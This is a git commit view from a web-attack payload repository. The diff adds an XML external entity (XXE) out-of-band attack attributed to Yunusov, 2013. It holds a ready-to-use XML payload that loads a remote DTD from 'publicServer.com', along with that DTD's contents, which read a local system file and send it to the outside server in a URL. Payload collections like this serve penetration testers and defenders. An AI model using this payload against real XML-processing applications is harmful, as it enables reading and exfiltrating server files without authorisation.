Clean project - Renamed and added PHP juggling type

This commit is contained in:
swisskyrepo
2016-10-20 10:22:24 +07:00
parent 4aa8ed4125
commit bce6dc6d3d
103 changed files with 26 additions and 0 deletions

View File

@@ -0,0 +1,9 @@
XXE OOB Attack (Yunusov, 2013)
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
<data>&send;</data>
File stored on http://publicServer.com/parameterEntity_oob.dtd
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
%all;